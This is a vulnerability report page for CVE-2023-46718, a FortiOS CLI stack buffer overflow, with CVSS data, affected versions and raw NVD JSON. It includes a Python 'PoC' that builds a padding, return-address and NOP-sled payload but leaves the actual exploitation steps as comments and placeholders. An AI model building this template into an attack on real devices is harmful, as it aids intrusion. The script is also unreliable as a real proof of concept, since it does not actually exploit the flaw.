Security Vulnerability Report
CVE-2023-46718 CVSS 6.7 MEDIUM

CVE-2023-46718

Published: 2025-10-14 16:15:34
Last Modified: 2025-10-16 13:01:25

Description

A stack-based buffer overflow in Fortinet FortiOS versions 7.4.0 through 7.4.1, 7.2.0 through 7.2.7, 7.0.0 through 7.0.12, 6.4.6 through 6.4.15, 6.2.9 through 6.2.16, and 6.0.13 through 6.0.18 allows an attacker to execute unauthorized code or commands via specially crafted CLI commands.

CVSS Details

CVSS Score: 6.7
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:fortinet:fortiproxy:*:*:*:*:*:*:*:* - VULNERABLE
FortiOS 7.4.0 - 7.4.1
FortiOS 7.2.0 - 7.2.7
FortiOS 7.0.0 - 7.0.12
FortiOS 6.4.6 - 6.4.15
FortiOS 6.2.9 - 6.2.16
FortiOS 6.0.13 - 6.0.18

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# FortiOS CLI Stack Buffer Overflow PoC (CVE-2023-46718)
# This is a conceptual PoC demonstrating the vulnerability pattern
# Actual exploitation requires local access with high privileges
import struct
import socket


def generate_overflow_payload(buffer_size=256, overflow_length=512):
    """
    Generate a CLI command payload that triggers stack buffer overflow
    in FortiOS CLI parser (CVE-2023-46718)
    """
    # Normal CLI command prefix (example: diagnose command)
    normal_cmd = b"diagnose "
    # Padding to fill the original buffer
    padding = b"A" * buffer_size
    # Overwrite saved return address (example: 0x41414141 placeholder)
    ret_address = struct.pack("<I", 0x41414141)
    # Shellcode placeholder (NOP sled + payload)
    nop_sled = b"\x90" * 32
    shellcode = b"\xcc" * 64  # INT3 breakpoints for debugging
    # Construct overflow payload
    payload = normal_cmd + padding + ret_address + nop_sled + shellcode
    payload = payload[:overflow_length]
    return payload


def exploit_fortios_cli(target_host, target_port=22, username="admin", password=""):
    """
    Conceptual exploit flow for CVE-2023-46718
    Requires valid credentials with high privileges
    """
    payload = generate_overflow_payload()
    print(f"[*] Target: {target_host}:{target_port}")
    print(f"[*] Payload length: {len(payload)} bytes")
    print(f"[*] Attempting to authenticate with high-privilege credentials...")
    # Step 1: Establish SSH connection to FortiGate device
    # Step 2: Authenticate with admin credentials (PR:H required)
    # Step 3: Enter CLI mode
    # Step 4: Send crafted CLI command to trigger overflow
    # Step 5: Overwrite return address to redirect execution
    # Step 6: Execute shellcode for arbitrary code execution
    print(f"[!] Note: This is a conceptual PoC for security research")
    print(f"[!] Actual exploitation details are intentionally abstracted")
    print(f"[!] Refer to FG-IR-23-354 for official advisory")


if __name__ == "__main__":
    # Example usage (DO NOT use against unauthorized systems)
    exploit_fortios_cli("192.168.1.1")
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-46718", "sourceIdentifier": "[email protected]", "published": "2025-10-14T16:15:33.653", "lastModified": "2025-10-16T13:01:25.443", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A stack-based buffer overflow in Fortinet FortiOS version 7.4.0 through 7.4.1 and 7.2.0 through 7.2.7 and 7.0.0 through 7.0.12 and 6.4.6 through 6.4.15 and 6.2.9 through 6.2.16 and 6.0.13 through 6.0.18 allows attacker to execute unauthorized code or commands via specially crafted CLI commands."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-121"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0.13", "versionEndIncluding": "6.0.18", "matchCriteriaId": "B338ECA4-60FD-499E-B22B-0F6D892C1896"}, {"vulnerable": true, "criteria": "cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*", 
"versionStartIncluding": "6.2.9", "versionEndIncluding": "6.2.17", "matchCriteriaId": "4BE3691A-0ECF-4FBF-A794-CDD14AAAA6B0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.4.6", "versionEndIncluding": "6.4.16", "matchCriteriaId": "FD140CE0-044F-4A24-91FF-2F9E0D020FA4"}, {"vulnerable": true, "criteria": "cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.2.12", "matchCriteriaId": "2337F791-B482-4C8C-85DF-F58AEC0DE277"}, {"vulnerable": true, "criteria": "cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.4.0", "versionEndExcluding": "7.4.2", "matchCriteriaId": "4316C2EA-3D6E-4A0C-B81D-ADCE040E03E0"}]}]}, {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortiproxy:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.4.8", "matchCriteriaId": "87D8C76E-50E7-4EE4-972C-19C4A0C46FE0"}]}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-23-354", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}